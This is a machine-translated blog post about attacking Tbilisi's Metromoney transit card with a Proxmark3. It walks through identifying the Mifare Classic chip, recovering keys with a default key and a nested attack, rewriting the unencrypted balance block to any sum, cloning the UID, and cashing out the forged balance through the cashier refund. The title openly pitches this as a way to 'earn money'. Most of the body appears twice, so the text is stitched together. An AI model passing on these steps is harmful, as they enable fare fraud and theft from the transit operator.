Study of the safety of the transport system of Tbilisi - or how to ride a vehicle and earn money
Immediately I hasten to warn you that there is no analogue in Georgia to Article 327 of the Criminal Code of the Russian Federation, therefore all actions described here are legal until damage in the amount of> 2000 GEL (~ 50,000 rubles) is caused.
It is worth noting that the idea itself was inspired by three other articles: "Troika" , "Plantain" , "Sitikard . "
')
The transport system in Tbilisi is somewhat different from the usual for residents of Russia. Here you will not see trams or trolley buses. There is only a bus, subway, taxi and cable car. The first and second will cost you 50 tetri (~ 12.5 rubles), a shuttle bus - 80 tetri, and a cable car - 2 or 3 lari. All this transport can be paid by Metromoney card.
Proxmark3 was used to examine the map. First of all, we define the type of rfid-tag:
As you can see, this is mifare classic 1k with a 4-byte uid. Proxmark supports three types of attacks on mifare classic: darkside, nested and hard nested. This card is vulnerable to all three, in contrast to the known to us "Troika" and "Plantain". This attack has long been known, it was described back in 2009 .
The next step is to check the map with a set of standard keys:
As a result, we find the standard key - FFFFFFFFFFFFF . Then go to the most nested attack:
In response, we get a key card that we needed. As we remember, in the previous three publications, the authors used a replay attack due to encryption, but turn our attention to the data structure here using MCT .
There is no encryption, it means that all we have to do is to register in the value block where the sum is 5 GEL, any amount we need (remember that> 2000 GEL). If you want to clone such a card, you need to clone uid cards, too. its hash is stored in a separate block. There is no online system for checking maps here, turnstiles in the metro as well as turnstiles on the cable car work offline, buses too. Georgia is an interesting country, there are payment terminals that work with offline transport cards.
In the photo the extreme right. On it you can see from below a special place where you should put the rfid-tag
We can bring the card with any of our balance and, it will display it without any problems and offer to replenish it.
There is also a small nuance here, such a card can be handed over to the cashier with the return of the entire amount on it (!) And the deposit value within 30 days from the date of purchase upon presentation of the check and the card itself.
The article would be incomplete if I did not mention the local debit card express bank. In my hands, quite by chance, I turned out to be a social card of a Georgian student, it looks like this:
The rfid tag itself is a jcop41 with mifare classic 1k emulation.
Of course, I will not pay anything with a credit card with a modified balance, because jokes with banks rarely end well, therefore, I don’t continue reading data from the card
gone
As correctly noted by the user 532CDCCC1022, all transport systems are to some degree unsafe. Using decade-old solutions only makes them more vulnerable.
PS All matches are random, and these actions are perfect by some unnamed Jedi.
It is worth noting that the idea itself was inspired by three other articles: "Troika" , "Plantain" , "Sitikard . "
')
The transport system in Tbilisi is somewhat different from the usual for residents of Russia. Here you will not see trams or trolley buses. There is only a bus, subway, taxi and cable car. The first and second will cost you 50 tetri (~ 12.5 rubles), a shuttle bus - 80 tetri, and a cable car - 2 or 3 lari. All this transport can be paid by Metromoney card.
Proxmark3 was used to examine the map. First of all, we define the type of rfid-tag:
As you can see, this is mifare classic 1k with a 4-byte uid. Proxmark supports three types of attacks on mifare classic: darkside, nested and hard nested. This card is vulnerable to all three, in contrast to the known to us "Troika" and "Plantain". This attack has long been known, it was described back in 2009 .
The next step is to check the map with a set of standard keys:
As a result, we find the standard key - FFFFFFFFFFFFF . Then go to the most nested attack:
In response, we get a key card that we needed. As we remember, in the previous three publications, the authors used a replay attack due to encryption, but turn our attention to the data structure here using MCT .
There is no encryption, it means that all we have to do is to register in the value block where the sum is 5 GEL, any amount we need (remember that> 2000 GEL). If you want to clone such a card, you need to clone uid cards, too. its hash is stored in a separate block. There is no online system for checking maps here, turnstiles in the metro as well as turnstiles on the cable car work offline, buses too. Georgia is an interesting country, there are payment terminals that work with offline transport cards.
In the photo the extreme right. On it you can see from below a special place where you should put the rfid-tag
We can bring the card with any of our balance and, it will display it without any problems and offer to replenish it.
There is also a small nuance here, such a card can be handed over to the cashier with the return of the entire amount on it (!) And the deposit value within 30 days from the date of purchase upon presentation of the check and the card itself.
The article would be incomplete if I did not mention the local debit card express bank. In my hands, quite by chance, I turned out to be a social card of a Georgian student, it looks like this:
The rfid tag itself is a jcop41 with mifare classic 1k emulation.
Of course, I will not pay anything with a credit card with a modified balance, because jokes with banks rarely end well, therefore, I don’t continue reading data from the card
gone
As correctly noted by the user 532CDCCC1022, all transport systems are to some degree unsafe. Using decade-old solutions only makes them more vulnerable.
PS All matches are random, and these actions are perfect by some unnamed Jedi.
Source: https://habr.com/ru/post/335702/
All Articles